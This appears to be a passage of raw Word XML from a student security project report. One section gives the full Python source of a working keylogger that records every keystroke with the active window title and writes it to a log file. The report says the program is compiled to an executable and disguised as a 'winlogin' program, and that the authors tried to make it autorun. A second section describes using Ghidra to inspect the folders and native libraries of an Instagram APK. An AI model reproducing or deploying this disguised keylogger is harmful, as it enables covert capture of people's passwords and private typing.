        <w:t xml:space="preserve">, the hardware requirements are similar to those of a standard computer system. The software requirements include installing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, a powerful reverse engineering tool, which provides the necessary capabilities to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> the mobile APK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB76ECA" w14:textId="117ACF3D" w:rsidR="00C24704" w:rsidRPr="002C7722" w:rsidRDefault="00C24704" w:rsidP="00C24704">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 xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DA1F4A" w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>TOOL</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> I</w:t>
      </w:r>
      <w:r w:rsidR="00DA1F4A" w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>MPLEMENTAT</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>IONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6D1128" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0637F5A4"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Python keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD73A58" w14:textId="77777777"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lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">This keylogger records the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>timestamps</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>of keys pressed and records the current window in which the keys are being pressed like Google, YouTube etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE60A6C"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xml:space="preserve">import </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pyautogui</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="662AC3DF"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xml:space="preserve">from </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pynput.keyboard</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 xml:space="preserve"> import Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A93EEC"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import logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DF8F58"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import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8AF1DF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006DB5C2"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lastRenderedPageBreak/>
        <w:t>log_dir</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 xml:space="preserve"> = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE27A5E"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logging.basicConfig</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(filename=(</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log_dir</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 xml:space="preserve"> + "access.log"), level=</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logging.DEBUG</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 format="%(</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asctime</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)s› %(message)s")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7D260B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E293452"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC91874"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xml:space="preserve">def </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on_press</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(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BBD029"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xml:space="preserve">    window = </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pyautogui.getActiveWindowTitle</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2DB3AD"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logging.info(f"{window} › {str(key)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A52B436"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D85695"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537E593C"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with Listener(</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on_press</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on_press</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 as listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31323B19" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>listener.join</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1201ED" w14:textId="77777777"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rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E0C4C1" w14:textId="77777777"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rPr>
        <w:t xml:space="preserve">The code is converted to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> executable file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E8EA11" w14:textId="77777777"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rPr>
        <w:t>We attempted to make use of the autorun feature, but to no avail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276872BB" w14:textId="77777777"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rPr>
        <w:t xml:space="preserve">The keylogger is disguised as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>winlogin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDEDD2D" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a powerful and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>widely-used</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse engineering tool developed by the National Security Agency (NSA). It provides a suite of features for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>analyzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and understanding various types of software, including mobile APKs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD7BF18" w14:textId="77777777"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rPr>
        <w:t xml:space="preserve">Analysis of Instagram </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file - Instagram_289.0.0.25.49.apk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CADAF4" w14:textId="77777777"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rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> had nested files in it, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> prompted us to select an import mode - single or batch or file system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3E974F" w14:textId="77777777"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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71E12798" wp14:editId="65B8DE0A">
            <wp:extent cx="3726503" cy="7376799"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="2844403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40364" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3726503" cy="7376799"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3F9548"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assets: This folder contains additional files and resources that are packaged with the APK. These files include images, sounds, HTML files, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>jsons</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> or other types of assets that the application </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>need.s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="214EADFF"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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>: The "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>" folder contained just one flowchart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6275C403" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="002B0E29" wp14:editId="0ECAFD49">
            <wp:extent cx="4496190" cy="3528366"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="150543084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0848" name="Picture 1" descr="A picture containing text, screenshot, diagram, line&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4496190" cy="3528366"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AED7FA7"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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>kotlin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>: The "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>kotlin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">" folder contains Kotlin-specific source code files and resources. Upon further inspection, it contained </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>kotlin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotations, collections, coroutines, internal, ranges, and reflect </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>builtins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64471E54"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lib: The "lib" folder usually holds native library files, which are compiled code files specific to a particular hardware architecture, x86. Contained many lib.so files such as </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1763759A" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:ind w:left="720"/>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libfb.so: This file is associated with the Facebook SDK (Software Development Kit). It provides functionality for integrating Facebook features into the application, such as social login, sharing, and analytics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA35CCD" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:ind w:left="720"/>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libglog.so: This file is related to the Google logging library, also known as "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>glog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>." It provides logging functionality that allows developers to log messages at different levels of severity for debugging and monitoring purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2C05BA" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
